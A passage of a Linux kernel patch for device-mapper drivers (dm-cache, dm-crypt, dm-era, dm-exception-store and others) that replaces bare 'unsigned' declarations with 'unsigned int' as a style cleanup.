++static unsigned int default_promote_level(struct smq_policy *mq)
+ {
+ 	/*
+ 	 * The promote level depends on the current performance of the
+@@ -1030,9 +1031,9 @@ static unsigned default_promote_level(struct smq_policy *mq)
+ 		1, 1, 1, 2, 4, 6, 7, 8, 7, 6, 4, 4, 3, 3, 2, 2, 1
+ 	};
+ 
+-	unsigned hits = mq->cache_stats.hits;
+-	unsigned misses = mq->cache_stats.misses;
+-	unsigned index = safe_div(hits << 4u, hits + misses);
++	unsigned int hits = mq->cache_stats.hits;
++	unsigned int misses = mq->cache_stats.misses;
++	unsigned int index = safe_div(hits << 4u, hits + misses);
+ 	return table[index];
+ }
+ 
+@@ -1042,7 +1043,7 @@ static void update_promote_levels(struct smq_policy *mq)
+ 	 * If there are unused cache entries then we want to be really
+ 	 * eager to promote.
+ 	 */
+-	unsigned threshold_level = allocator_empty(&mq->cache_alloc) ?
++	unsigned int threshold_level = allocator_empty(&mq->cache_alloc) ?
+ 		default_promote_level(mq) : (NR_HOTSPOT_LEVELS / 2u);
+ 
+ 	threshold_level = max(threshold_level, NR_HOTSPOT_LEVELS);
+@@ -1124,7 +1125,7 @@ static void end_cache_period(struct smq_policy *mq)
+ #define CLEAN_TARGET 25u
+ #define FREE_TARGET 25u
+ 
+-static unsigned percent_to_target(struct smq_policy *mq, unsigned p)
++static unsigned int percent_to_target(struct smq_policy *mq, unsigned int p)
+ {
+ 	return from_cblock(mq->cache_size) * p / 100u;
+ }
+@@ -1150,7 +1151,7 @@ static bool clean_target_met(struct smq_policy *mq, bool idle)
+ 
+ static bool free_target_met(struct smq_policy *mq)
+ {
+-	unsigned nr_free;
++	unsigned int nr_free;
+ 
+ 	nr_free = from_cblock(mq->cache_size) - mq->cache_alloc.nr_allocated;
+ 	return (nr_free + btracker_nr_demotions_queued(mq->bg_work)) >=
+@@ -1300,7 +1301,7 @@ static dm_oblock_t to_hblock(struct smq_policy *mq, dm_oblock_t b)
+ 
+ static struct entry *update_hotspot_queue(struct smq_policy *mq, dm_oblock_t b)
+ {
+-	unsigned hi;
++	unsigned int hi;
+ 	dm_oblock_t hb = to_hblock(mq, b);
+ 	struct entry *e = h_lookup(&mq->hotspot_table, hb);
+ 
+@@ -1549,7 +1550,7 @@ static void smq_clear_dirty(struct dm_cache_policy *p, dm_cblock_t cblock)
+ 	spin_unlock_irqrestore(&mq->lock, flags);
+ }
+ 
+-static unsigned random_level(dm_cblock_t cblock)
++static unsigned int random_level(dm_cblock_t cblock)
+ {
+ 	return hash_32(from_cblock(cblock), 9) & (NR_CACHE_LEVELS - 1);
+ }
+@@ -1660,7 +1661,7 @@ static int mq_set_config_value(struct dm_cache_policy *p,
+ }
+ 
+ static int mq_emit_config_values(struct dm_cache_policy *p, char *result,
+-				 unsigned maxlen, ssize_t *sz_ptr)
++				 unsigned int maxlen, ssize_t *sz_ptr)
+ {
+ 	ssize_t sz = *sz_ptr;
+ 
+@@ -1699,16 +1700,16 @@ static void init_policy_functions(struct smq_policy *mq, bool mimic_mq)
+ 
+ static bool too_many_hotspot_blocks(sector_t origin_size,
+ 				    sector_t hotspot_block_size,
+-				    unsigned nr_hotspot_blocks)
++				    unsigned int nr_hotspot_blocks)
+ {
+ 	return (hotspot_block_size * nr_hotspot_blocks) > origin_size;
+ }
+ 
+ static void calc_hotspot_params(sector_t origin_size,
+ 				sector_t cache_block_size,
+-				unsigned nr_cache_blocks,
++				unsigned int nr_cache_blocks,
+ 				sector_t *hotspot_block_size,
+-				unsigned *nr_hotspot_blocks)
++				unsigned int *nr_hotspot_blocks)
+ {
+ 	*hotspot_block_size = cache_block_size * 16u;
+ 	*nr_hotspot_blocks = max(nr_cache_blocks / 4u, 1024u);
+@@ -1724,9 +1725,9 @@ static struct dm_cache_policy *__smq_create(dm_cblock_t cache_size,
+ 					    bool mimic_mq,
+ 					    bool migrations_allowed)
+ {
+-	unsigned i;
+-	unsigned nr_sentinels_per_queue = 2u * NR_CACHE_LEVELS;
+-	unsigned total_sentinels = 2u * nr_sentinels_per_queue;
++	unsigned int i;
++	unsigned int nr_sentinels_per_queue = 2u * NR_CACHE_LEVELS;
++	unsigned int total_sentinels = 2u * nr_sentinels_per_queue;
+ 	struct smq_policy *mq = kzalloc(sizeof(*mq), GFP_KERNEL);
+ 
+ 	if (!mq)
+diff --git a/drivers/md/dm-cache-policy.c b/drivers/md/dm-cache-policy.c
+index c1a3cee99b445..2e58bbcf3e3bd 100644
+--- a/drivers/md/dm-cache-policy.c
++++ b/drivers/md/dm-cache-policy.c
+@@ -154,7 +154,7 @@ const char *dm_cache_policy_get_name(struct dm_cache_policy *p)
+ }
+ EXPORT_SYMBOL_GPL(dm_cache_policy_get_name);
+ 
+-const unsigned *dm_cache_policy_get_version(struct dm_cache_policy *p)
++const unsigned int *dm_cache_policy_get_version(struct dm_cache_policy *p)
+ {
+ 	struct dm_cache_policy_type *t = p->private;
+ 
+diff --git a/drivers/md/dm-cache-policy.h b/drivers/md/dm-cache-policy.h
+index 06eb31af626f1..6ba3e9c91af53 100644
+--- a/drivers/md/dm-cache-policy.h
++++ b/drivers/md/dm-cache-policy.h
+@@ -128,7 +128,7 @@ struct dm_cache_policy {
+ 	 * Configuration.
+ 	 */
+ 	int (*emit_config_values)(struct dm_cache_policy *p, char *result,
+-				  unsigned maxlen, ssize_t *sz_ptr);
++				  unsigned int maxlen, ssize_t *sz_ptr);
+ 	int (*set_config_value)(struct dm_cache_policy *p,
+ 				const char *key, const char *value);
+ 
+@@ -157,7 +157,7 @@ struct dm_cache_policy_type {
+ 	 * what gets passed on the target line to select your policy.
+ 	 */
+ 	char name[CACHE_POLICY_NAME_SIZE];
+-	unsigned version[CACHE_POLICY_VERSION_SIZE];
++	unsigned int version[CACHE_POLICY_VERSION_SIZE];
+ 
+ 	/*
+ 	 * For use by an alias dm_cache_policy_type to point to the
+diff --git a/drivers/md/dm-cache-target.c b/drivers/md/dm-cache-target.c
+index 17fde3e5a1f7b..8f7426b71e025 100644
+--- a/drivers/md/dm-cache-target.c
++++ b/drivers/md/dm-cache-target.c
+@@ -275,7 +275,7 @@ enum cache_io_mode {
+ struct cache_features {
+ 	enum cache_metadata_mode mode;
+ 	enum cache_io_mode io_mode;
+-	unsigned metadata_version;
++	unsigned int metadata_version;
+ 	bool discard_passdown:1;
+ };
+ 
+@@ -362,7 +362,7 @@ struct cache {
+ 	 * Rather than reconstructing the table line for the status we just
+ 	 * save it and regurgitate.
+ 	 */
+-	unsigned nr_ctr_args;
++	unsigned int nr_ctr_args;
+ 	const char **ctr_args;
+ 
+ 	struct dm_kcopyd_client *copier;
+@@ -378,7 +378,7 @@ struct cache {
+ 	unsigned long *dirty_bitset;
+ 	atomic_t nr_dirty;
+ 
+-	unsigned policy_nr_args;
++	unsigned int policy_nr_args;
+ 	struct dm_cache_policy *policy;
+ 
+ 	/*
+@@ -409,7 +409,7 @@ struct cache {
+ 
+ struct per_bio_data {
+ 	bool tick:1;
+-	unsigned req_nr:2;
++	unsigned int req_nr:2;
+ 	struct dm_bio_prison_cell_v2 *cell;
+ 	struct dm_hook_info hook_info;
+ 	sector_t len;
+@@ -517,7 +517,7 @@ static void build_key(dm_oblock_t begin, dm_oblock_t end, struct dm_cell_key_v2
+ #define WRITE_LOCK_LEVEL 0
+ #define READ_WRITE_LOCK_LEVEL 1
+ 
+-static unsigned lock_level(struct bio *bio)
++static unsigned int lock_level(struct bio *bio)
+ {
+ 	return bio_data_dir(bio) == WRITE ?
+ 		WRITE_LOCK_LEVEL :
+@@ -1884,7 +1884,7 @@ static void check_migrations(struct work_struct *ws)
+  */
+ static void destroy(struct cache *cache)
+ {
+-	unsigned i;
++	unsigned int i;
+ 
+ 	mempool_exit(&cache->migration_pool);
+ 
+@@ -2124,7 +2124,7 @@ static int parse_features(struct cache_args *ca, struct dm_arg_set *as,
+ 	};
+ 
+ 	int r, mode_ctr = 0;
+-	unsigned argc;
++	unsigned int argc;
+ 	const char *arg;
+ 	struct cache_features *cf = &ca->features;
+ 
+@@ -2544,7 +2544,7 @@ bad:
+ 
+ static int copy_ctr_args(struct cache *cache, int argc, const char **argv)
+ {
+-	unsigned i;
++	unsigned int i;
+ 	const char **copy;
+ 
+ 	copy = kcalloc(argc, sizeof(*copy), GFP_KERNEL);
+@@ -2566,7 +2566,7 @@ static int copy_ctr_args(struct cache *cache, int argc, const char **argv)
+ 	return 0;
+ }
+ 
+-static int cache_ctr(struct dm_target *ti, unsigned argc, char **argv)
++static int cache_ctr(struct dm_target *ti, unsigned int argc, char **argv)
+ {
+ 	int r = -EINVAL;
+ 	struct cache_args *ca;
+@@ -2669,7 +2669,7 @@ static int write_dirty_bitset(struct cache *cache)
+ 
+ static int write_discard_bitset(struct cache *cache)
+ {
+-	unsigned i, r;
++	unsigned int i, r;
+ 
+ 	if (get_cache_mode(cache) >= CM_READ_ONLY)
+ 		return -EINVAL;
+@@ -2983,11 +2983,11 @@ static void cache_resume(struct dm_target *ti)
+ }
+ 
+ static void emit_flags(struct cache *cache, char *result,
+-		       unsigned maxlen, ssize_t *sz_ptr)
++		       unsigned int maxlen, ssize_t *sz_ptr)
+ {
+ 	ssize_t sz = *sz_ptr;
+ 	struct cache_features *cf = &cache->features;
+-	unsigned count = (cf->metadata_version == 2) + !cf->discard_passdown + 1;
++	unsigned int count = (cf->metadata_version == 2) + !cf->discard_passdown + 1;
+ 
+ 	DMEMIT("%u ", count);
+ 
+@@ -3027,10 +3027,10 @@ static void emit_flags(struct cache *cache, char *result,
+  * <policy name> <#policy args> <policy args>* <cache metadata mode> <needs_check>
+  */
+ static void cache_status(struct dm_target *ti, status_type_t type,
+-			 unsigned status_flags, char *result, unsigned maxlen)
++			 unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	int r = 0;
+-	unsigned i;
++	unsigned int i;
+ 	ssize_t sz = 0;
+ 	dm_block_t nr_free_blocks_metadata = 0;
+ 	dm_block_t nr_blocks_metadata = 0;
+@@ -3067,18 +3067,18 @@ static void cache_status(struct dm_target *ti, status_type_t type,
+ 		residency = policy_residency(cache->policy);
+ 
+ 		DMEMIT("%u %llu/%llu %llu %llu/%llu %u %u %u %u %u %u %lu ",
+-		       (unsigned)DM_CACHE_METADATA_BLOCK_SIZE,
++		       (unsigned int)DM_CACHE_METADATA_BLOCK_SIZE,
+ 		       (unsigned long long)(nr_blocks_metadata - nr_free_blocks_metadata),
+ 		       (unsigned long long)nr_blocks_metadata,
+ 		       (unsigned long long)cache->sectors_per_block,
+ 		       (unsigned long long) from_cblock(residency),
+ 		       (unsigned long long) from_cblock(cache->cache_size),
+-		       (unsigned) atomic_read(&cache->stats.read_hit),
+-		       (unsigned) atomic_read(&cache->stats.read_miss),
+-		       (unsigned) atomic_read(&cache->stats.write_hit),
+-		       (unsigned) atomic_read(&cache->stats.write_miss),
+-		       (unsigned) atomic_read(&cache->stats.demotion),
+-		       (unsigned) atomic_read(&cache->stats.promotion),
++		       (unsigned int) atomic_read(&cache->stats.read_hit),
++		       (unsigned int) atomic_read(&cache->stats.read_miss),
++		       (unsigned int) atomic_read(&cache->stats.write_hit),
++		       (unsigned int) atomic_read(&cache->stats.write_miss),
++		       (unsigned int) atomic_read(&cache->stats.demotion),
++		       (unsigned int) atomic_read(&cache->stats.promotion),
+ 		       (unsigned long) atomic_read(&cache->nr_dirty));
+ 
+ 		emit_flags(cache, result, maxlen, &sz);
+@@ -3257,11 +3257,11 @@ static int request_invalidation(struct cache *cache, struct cblock_range *range)
+ 	return r;
+ }
+ 
+-static int process_invalidate_cblocks_message(struct cache *cache, unsigned count,
++static int process_invalidate_cblocks_message(struct cache *cache, unsigned int count,
+ 					      const char **cblock_ranges)
+ {
+ 	int r = 0;
+-	unsigned i;
++	unsigned int i;
+ 	struct cblock_range range;
+ 
+ 	if (!passthrough_mode(cache)) {
+@@ -3298,8 +3298,8 @@ static int process_invalidate_cblocks_message(struct cache *cache, unsigned coun
+  *
+  * The key migration_threshold is supported by the cache target core.
+  */
+-static int cache_message(struct dm_target *ti, unsigned argc, char **argv,
+-			 char *result, unsigned maxlen)
++static int cache_message(struct dm_target *ti, unsigned int argc, char **argv,
++			 char *result, unsigned int maxlen)
+ {
+ 	struct cache *cache = ti->private;
+ 
+diff --git a/drivers/md/dm-core.h b/drivers/md/dm-core.h
+index 6c6bd24774f25..28c641352de9b 100644
+--- a/drivers/md/dm-core.h
++++ b/drivers/md/dm-core.h
+@@ -119,7 +119,7 @@ struct mapped_device {
+ 	struct dm_stats stats;
+ 
+ 	/* the number of internal suspends */
+-	unsigned internal_suspend_count;
++	unsigned int internal_suspend_count;
+ 
+ 	int swap_bios;
+ 	struct semaphore swap_bios_semaphore;
+@@ -326,9 +326,9 @@ static inline struct completion *dm_get_completion_from_kobject(struct kobject *
+ 	return &container_of(kobj, struct dm_kobject_holder, kobj)->completion;
+ }
+ 
+-unsigned __dm_get_module_param(unsigned *module_param, unsigned def, unsigned max);
++unsigned int __dm_get_module_param(unsigned int *module_param, unsigned int def, unsigned int max);
+ 
+-static inline bool dm_message_test_buffer_overflow(char *result, unsigned maxlen)
++static inline bool dm_message_test_buffer_overflow(char *result, unsigned int maxlen)
+ {
+ 	return !maxlen || strlen(result) + 1 >= maxlen;
+ }
+diff --git a/drivers/md/dm-crypt.c b/drivers/md/dm-crypt.c
+index dc2d0d61ade93..ee269b1d09fac 100644
+--- a/drivers/md/dm-crypt.c
++++ b/drivers/md/dm-crypt.c
+@@ -173,14 +173,14 @@ struct crypt_config {
+ 	} iv_gen_private;
+ 	u64 iv_offset;
+ 	unsigned int iv_size;
+-	unsigned short int sector_size;
++	unsigned short sector_size;
+ 	unsigned char sector_shift;
+ 
+ 	union {
+ 		struct crypto_skcipher **tfms;
+ 		struct crypto_aead **tfms_aead;
+ 	} cipher_tfm;
+-	unsigned tfms_count;
++	unsigned int tfms_count;
+ 	unsigned long cipher_flags;
+ 
+ 	/*
+@@ -214,7 +214,7 @@ struct crypt_config {
+ 	 * pool for per bio private data, crypto requests,
+ 	 * encryption requeusts/buffer pages and integrity tags
+ 	 */
+-	unsigned tag_pool_max_sectors;
++	unsigned int tag_pool_max_sectors;
+ 	mempool_t tag_pool;
+ 	mempool_t req_pool;
+ 	mempool_t page_pool;
+@@ -231,7 +231,7 @@ struct crypt_config {
+ #define POOL_ENTRY_SIZE	512
+ 
+ static DEFINE_SPINLOCK(dm_crypt_clients_lock);
+-static unsigned dm_crypt_clients_n = 0;
++static unsigned int dm_crypt_clients_n = 0;
+ static volatile unsigned long dm_crypt_pages_per_client;
+ #define DM_CRYPT_MEMORY_PERCENT			2
+ #define DM_CRYPT_MIN_PAGES_PER_CLIENT		(BIO_MAX_VECS * 16)
+@@ -356,7 +356,7 @@ static int crypt_iv_essiv_gen(struct crypt_config *cc, u8 *iv,
+ static int crypt_iv_benbi_ctr(struct crypt_config *cc, struct dm_target *ti,
+ 			      const char *opts)
+ {
+-	unsigned bs;
++	unsigned int bs;
+ 	int log;
+ 
+ 	if (crypt_integrity_aead(cc))
+@@ -1466,7 +1466,7 @@ static void kcryptd_async_done(struct crypto_async_request *async_req,
+ static int crypt_alloc_req_skcipher(struct crypt_config *cc,
+ 				     struct convert_context *ctx)
+ {
+-	unsigned key_index = ctx->cc_sector & (cc->tfms_count - 1);
++	unsigned int key_index = ctx->cc_sector & (cc->tfms_count - 1);
+ 
+ 	if (!ctx->r.req) {
+ 		ctx->r.req = mempool_alloc(&cc->req_pool, in_interrupt() ? GFP_ATOMIC : GFP_NOIO);
+@@ -1660,13 +1660,13 @@ static void crypt_free_buffer_pages(struct crypt_config *cc, struct bio *clone);
+  * non-blocking allocations without a mutex first but on failure we fallback
+  * to blocking allocations with a mutex.
+  */
+-static struct bio *crypt_alloc_buffer(struct dm_crypt_io *io, unsigned size)
++static struct bio *crypt_alloc_buffer(struct dm_crypt_io *io, unsigned int size)
+ {
+ 	struct crypt_config *cc = io->cc;
+ 	struct bio *clone;
+ 	unsigned int nr_iovecs = (size + PAGE_SIZE - 1) >> PAGE_SHIFT;
+ 	gfp_t gfp_mask = GFP_NOWAIT | __GFP_HIGHMEM;
+-	unsigned i, len, remaining_size;
++	unsigned int i, len, remaining_size;
+ 	struct page *page;
+ 
+ retry:
+@@ -1806,7 +1806,7 @@ static void crypt_endio(struct bio *clone)
+ {
+ 	struct dm_crypt_io *io = clone->bi_private;
+ 	struct crypt_config *cc = io->cc;
+-	unsigned rw = bio_data_dir(clone);
++	unsigned int rw = bio_data_dir(clone);
+ 	blk_status_t error;
+ 
+ 	/*
+@@ -2261,7 +2261,7 @@ static void crypt_free_tfms_aead(struct crypt_config *cc)
+ 
+ static void crypt_free_tfms_skcipher(struct crypt_config *cc)
+ {
+-	unsigned i;
++	unsigned int i;
+ 
+ 	if (!cc->cipher_tfm.tfms)
+ 		return;
+@@ -2286,7 +2286,7 @@ static void crypt_free_tfms(struct crypt_config *cc)
+ 
+ static int crypt_alloc_tfms_skcipher(struct crypt_config *cc, char *ciphermode)
+ {
+-	unsigned i;
++	unsigned int i;
+ 	int err;
+ 
+ 	cc->cipher_tfm.tfms = kcalloc(cc->tfms_count,
+@@ -2344,12 +2344,12 @@ static int crypt_alloc_tfms(struct crypt_config *cc, char *ciphermode)
+ 		return crypt_alloc_tfms_skcipher(cc, ciphermode);
+ }
+ 
+-static unsigned crypt_subkey_size(struct crypt_config *cc)
++static unsigned int crypt_subkey_size(struct crypt_config *cc)
+ {
+ 	return (cc->key_size - cc->key_extra_size) >> ilog2(cc->tfms_count);
+ }
+ 
+-static unsigned crypt_authenckey_size(struct crypt_config *cc)
++static unsigned int crypt_authenckey_size(struct crypt_config *cc)
+ {
+ 	return crypt_subkey_size(cc) + RTA_SPACE(sizeof(struct crypto_authenc_key_param));
+ }
+@@ -2360,7 +2360,7 @@ static unsigned crypt_authenckey_size(struct crypt_config *cc)
+  * This funcion converts cc->key to this special format.
+  */
+ static void crypt_copy_authenckey(char *p, const void *key,
+-				  unsigned enckeylen, unsigned authkeylen)
++				  unsigned int enckeylen, unsigned int authkeylen)
+ {
+ 	struct crypto_authenc_key_param *param;
+ 	struct rtattr *rta;
+@@ -2378,7 +2378,7 @@ static void crypt_copy_authenckey(char *p, const void *key,
+ 
+ static int crypt_setkey(struct crypt_config *cc)
+ {
+-	unsigned subkey_size;
++	unsigned int subkey_size;
+ 	int err = 0, i, r;
+ 
+ 	/* Ignore extra keys (which are used for IV etc) */
+@@ -3417,7 +3417,7 @@ static int crypt_map(struct dm_target *ti, struct bio *bio)
+ 	crypt_io_init(io, cc, bio, dm_target_offset(ti, bio->bi_iter.bi_sector));
+ 
+ 	if (cc->on_disk_tag_size) {
+-		unsigned tag_len = cc->on_disk_tag_size * (bio_sectors(bio) >> cc->sector_shift);
++		unsigned int tag_len = cc->on_disk_tag_size * (bio_sectors(bio) >> cc->sector_shift);
+ 
+ 		if (unlikely(tag_len > KMALLOC_MAX_SIZE) ||
+ 		    unlikely(!(io->integrity_metadata = kmalloc(tag_len,
+@@ -3445,14 +3445,14 @@ static int crypt_map(struct dm_target *ti, struct bio *bio)
+ 
+ static char hex2asc(unsigned char c)
+ {
+-	return c + '0' + ((unsigned)(9 - c) >> 4 & 0x27);
++	return c + '0' + ((unsigned int)(9 - c) >> 4 & 0x27);
+ }
+ 
+ static void crypt_status(struct dm_target *ti, status_type_t type,
+-			 unsigned status_flags, char *result, unsigned maxlen)
++			 unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	struct crypt_config *cc = ti->private;
+-	unsigned i, sz = 0;
++	unsigned int i, sz = 0;
+ 	int num_feature_args = 0;
+ 
+ 	switch (type) {
+@@ -3568,8 +3568,8 @@ static void crypt_resume(struct dm_target *ti)
+  *	key set <key>
+  *	key wipe
+  */
+-static int crypt_message(struct dm_target *ti, unsigned argc, char **argv,
+-			 char *result, unsigned maxlen)
++static int crypt_message(struct dm_target *ti, unsigned int argc, char **argv,
++			 char *result, unsigned int maxlen)
+ {
+ 	struct crypt_config *cc = ti->private;
+ 	int key_size, ret = -EINVAL;
+@@ -3630,10 +3630,10 @@ static void crypt_io_hints(struct dm_target *ti, struct queue_limits *limits)
+ 	limits->max_segment_size = PAGE_SIZE;
+ 
+ 	limits->logical_block_size =
+-		max_t(unsigned, limits->logical_block_size, cc->sector_size);
++		max_t(unsigned int, limits->logical_block_size, cc->sector_size);
+ 	limits->physical_block_size =
+-		max_t(unsigned, limits->physical_block_size, cc->sector_size);
+-	limits->io_min = max_t(unsigned, limits->io_min, cc->sector_size);
++		max_t(unsigned int, limits->physical_block_size, cc->sector_size);
++	limits->io_min = max_t(unsigned int, limits->io_min, cc->sector_size);
+ 	limits->dma_alignment = limits->logical_block_size - 1;
+ }
+ 
+diff --git a/drivers/md/dm-delay.c b/drivers/md/dm-delay.c
+index 869afef5654ae..02b8f4e818276 100644
+--- a/drivers/md/dm-delay.c
++++ b/drivers/md/dm-delay.c
+@@ -20,8 +20,8 @@
+ struct delay_class {
+ 	struct dm_dev *dev;
+ 	sector_t start;
+-	unsigned delay;
+-	unsigned ops;
++	unsigned int delay;
++	unsigned int ops;
+ };
+ 
+ struct delay_c {
+@@ -305,7 +305,7 @@ static int delay_map(struct dm_target *ti, struct bio *bio)
+ 	DMEMIT("%s %llu %u", (c)->dev->name, (unsigned long long)(c)->start, (c)->delay)
+ 
+ static void delay_status(struct dm_target *ti, status_type_t type,
+-			 unsigned status_flags, char *result, unsigned maxlen)
++			 unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	struct delay_c *dc = ti->private;
+ 	int sz = 0;
+diff --git a/drivers/md/dm-ebs-target.c b/drivers/md/dm-ebs-target.c
+index 512cc6cea095a..7606c6695a0e2 100644
+--- a/drivers/md/dm-ebs-target.c
++++ b/drivers/md/dm-ebs-target.c
+@@ -390,7 +390,7 @@ static int ebs_map(struct dm_target *ti, struct bio *bio)
+ }
+ 
+ static void ebs_status(struct dm_target *ti, status_type_t type,
+-		       unsigned status_flags, char *result, unsigned maxlen)
++		       unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	struct ebs_c *ec = ti->private;
+ 
+diff --git a/drivers/md/dm-era-target.c b/drivers/md/dm-era-target.c
+index e92c1afc3677f..a96290103cca8 100644
+--- a/drivers/md/dm-era-target.c
++++ b/drivers/md/dm-era-target.c
+@@ -51,7 +51,7 @@ static void writeset_free(struct writeset *ws)
+ }
+ 
+ static int setup_on_disk_bitset(struct dm_disk_bitset *info,
+-				unsigned nr_bits, dm_block_t *root)
++				unsigned int nr_bits, dm_block_t *root)
+ {
+ 	int r;
+ 
+@@ -62,7 +62,7 @@ static int setup_on_disk_bitset(struct dm_disk_bitset *info,
+ 	return dm_bitset_resize(info, *root, 0, nr_bits, false, root);
+ }
+ 
+-static size_t bitset_size(unsigned nr_bits)
++static size_t bitset_size(unsigned int nr_bits)
+ {
+ 	return sizeof(unsigned long) * dm_div_up(nr_bits, BITS_PER_LONG);
+ }
+@@ -323,10 +323,10 @@ static int superblock_lock(struct era_metadata *md,
+ static int superblock_all_zeroes(struct dm_block_manager *bm, bool *result)
+ {
+ 	int r;
+-	unsigned i;
++	unsigned int i;
+ 	struct dm_block *b;
+ 	__le64 *data_le, zero = cpu_to_le64(0);
+-	unsigned sb_block_size = dm_bm_block_size(bm) / sizeof(__le64);
++	unsigned int sb_block_size = dm_bm_block_size(bm) / sizeof(__le64);
+ 
+ 	/*
+ 	 * We can't use a validator here - it may be all zeroes.
+@@ -363,12 +363,12 @@ static void ws_unpack(const struct writeset_disk *disk, struct writeset_metadata
+ 	core->root = le64_to_cpu(disk->root);
+ }
+ 
+-static void ws_inc(void *context, const void *value, unsigned count)
++static void ws_inc(void *context, const void *value, unsigned int count)
+ {
+ 	struct era_metadata *md = context;
+ 	struct writeset_disk ws_d;
+ 	dm_block_t b;
+-	unsigned i;
++	unsigned int i;
+ 
+ 	for (i = 0; i < count; i++) {
+ 		memcpy(&ws_d, value + (i * sizeof(ws_d)), sizeof(ws_d));
+@@ -377,12 +377,12 @@ static void ws_inc(void *context, const void *value, unsigned count)
+ 	}
+ }
+ 
+-static void ws_dec(void *context, const void *value, unsigned count)
++static void ws_dec(void *context, const void *value, unsigned int count)
+ {
+ 	struct era_metadata *md = context;
+ 	struct writeset_disk ws_d;
+ 	dm_block_t b;
+-	unsigned i;
++	unsigned int i;
+ 
+ 	for (i = 0; i < count; i++) {
+ 		memcpy(&ws_d, value + (i * sizeof(ws_d)), sizeof(ws_d));
+@@ -667,7 +667,7 @@ static void swap_writeset(struct era_metadata *md, struct writeset *new_writeset
+  *--------------------------------------------------------------*/
+ struct digest {
+ 	uint32_t era;
+-	unsigned nr_bits, current_bit;
++	unsigned int nr_bits, current_bit;
+ 	struct writeset_metadata writeset;
+ 	__le32 value;
+ 	struct dm_disk_bitset info;
+@@ -702,7 +702,7 @@ static int metadata_digest_transcribe_writeset(struct era_metadata *md,
+ {
+ 	int r;
+ 	bool marked;
+-	unsigned b, e = min(d->current_bit + INSERTS_PER_STEP, d->nr_bits);
++	unsigned int b, e = min(d->current_bit + INSERTS_PER_STEP, d->nr_bits);
+ 
+ 	for (b = d->current_bit; b < e; b++) {
+ 		r = writeset_marked_on_disk(&d->info, &d->writeset, b, &marked);
+@@ -1439,7 +1439,7 @@ static bool valid_block_size(dm_block_t block_size)
+ /*
+  * <metadata dev> <data dev> <data block size (sectors)>
+  */
+-static int era_ctr(struct dm_target *ti, unsigned argc, char **argv)
++static int era_ctr(struct dm_target *ti, unsigned int argc, char **argv)
+ {
+ 	int r;
+ 	char dummy;
+@@ -1618,7 +1618,7 @@ static int era_preresume(struct dm_target *ti)
+  * <current era> <held metadata root | '-'>
+  */
+ static void era_status(struct dm_target *ti, status_type_t type,
+-		       unsigned status_flags, char *result, unsigned maxlen)
++		       unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	int r;
+ 	struct era *era = ti->private;
+@@ -1633,10 +1633,10 @@ static void era_status(struct dm_target *ti, status_type_t type,
+ 			goto err;
+ 
+ 		DMEMIT("%u %llu/%llu %u",
+-		       (unsigned) (DM_ERA_METADATA_BLOCK_SIZE >> SECTOR_SHIFT),
++		       (unsigned int) (DM_ERA_METADATA_BLOCK_SIZE >> SECTOR_SHIFT),
+ 		       (unsigned long long) stats.used,
+ 		       (unsigned long long) stats.total,
+-		       (unsigned) stats.era);
++		       (unsigned int) stats.era);
+ 
+ 		if (stats.snap != SUPERBLOCK_LOCATION)
+ 			DMEMIT(" %llu", stats.snap);
+@@ -1662,8 +1662,8 @@ err:
+ 	DMEMIT("Error");
+ }
+ 
+-static int era_message(struct dm_target *ti, unsigned argc, char **argv,
+-		       char *result, unsigned maxlen)
++static int era_message(struct dm_target *ti, unsigned int argc, char **argv,
++		       char *result, unsigned int maxlen)
+ {
+ 	struct era *era = ti->private;
+ 
+diff --git a/drivers/md/dm-exception-store.c b/drivers/md/dm-exception-store.c
+index 3997f34cfebc6..cc3987c97eb94 100644
+--- a/drivers/md/dm-exception-store.c
++++ b/drivers/md/dm-exception-store.c
+@@ -142,7 +142,7 @@ EXPORT_SYMBOL(dm_exception_store_type_unregister);
+ static int set_chunk_size(struct dm_exception_store *store,
+ 			  const char *chunk_size_arg, char **error)
+ {
+-	unsigned chunk_size;
++	unsigned int chunk_size;
+ 
+ 	if (kstrtouint(chunk_size_arg, 10, &chunk_size)) {
+ 		*error = "Invalid chunk size";
+@@ -158,7 +158,7 @@ static int set_chunk_size(struct dm_exception_store *store,
+ }
+ 
+ int dm_exception_store_set_chunk_size(struct dm_exception_store *store,
+-				      unsigned chunk_size,
++				      unsigned int chunk_size,
+ 				      char **error)
+ {
+ 	/* Check chunk_size is a power of 2 */
+@@ -190,7 +190,7 @@ int dm_exception_store_set_chunk_size(struct dm_exception_store *store,
+ 
+ int dm_exception_store_create(struct dm_target *ti, int argc, char **argv,
+ 			      struct dm_snapshot *snap,
+-			      unsigned *args_used,
++			      unsigned int *args_used,
+ 			      struct dm_exception_store **store)
+ {
+ 	int r = 0;
+diff --git a/drivers/md/dm-exception-store.h b/drivers/md/dm-exception-store.h
+index b5f20eba36415..862df68a7db04 100644
+--- a/drivers/md/dm-exception-store.h
++++ b/drivers/md/dm-exception-store.h
+@@ -96,9 +96,9 @@ struct dm_exception_store_type {
+ 	 */
+ 	void (*drop_snapshot) (struct dm_exception_store *store);
+ 
+-	unsigned (*status) (struct dm_exception_store *store,
+-			    status_type_t status, char *result,
+-			    unsigned maxlen);
++	unsigned int (*status) (struct dm_exception_store *store,
++				status_type_t status, char *result,
++				unsigned int maxlen);
+ 
+ 	/*
+ 	 * Return how full the snapshot is.
+@@ -118,9 +118,9 @@ struct dm_exception_store {
+ 	struct dm_snapshot *snap;
+ 
+ 	/* Size of data blocks saved - must be a power of 2 */
+-	unsigned chunk_size;
+-	unsigned chunk_mask;
+-	unsigned chunk_shift;
++	unsigned int chunk_size;
++	unsigned int chunk_mask;
++	unsigned int chunk_shift;
+ 
+ 	void *context;
+ 
+@@ -144,7 +144,7 @@ static inline chunk_t dm_chunk_number(chunk_t chunk)
+ 	return chunk & (chunk_t)((1ULL << DM_CHUNK_NUMBER_BITS) - 1ULL);
+ }
+ 
+-static inline unsigned dm_consecutive_chunk_count(struct dm_exception *e)
++static inline unsigned int dm_consecutive_chunk_count(struct dm_exception *e)
+ {
+ 	return e->new_chunk >> DM_CHUNK_NUMBER_BITS;
+ }
+@@ -181,12 +181,12 @@ int dm_exception_store_type_register(struct dm_exception_store_type *type);
+ int dm_exception_store_type_unregister(struct dm_exception_store_type *type);
+ 
+ int dm_exception_store_set_chunk_size(struct dm_exception_store *store,
+-				      unsigned chunk_size,
++				      unsigned int chunk_size,
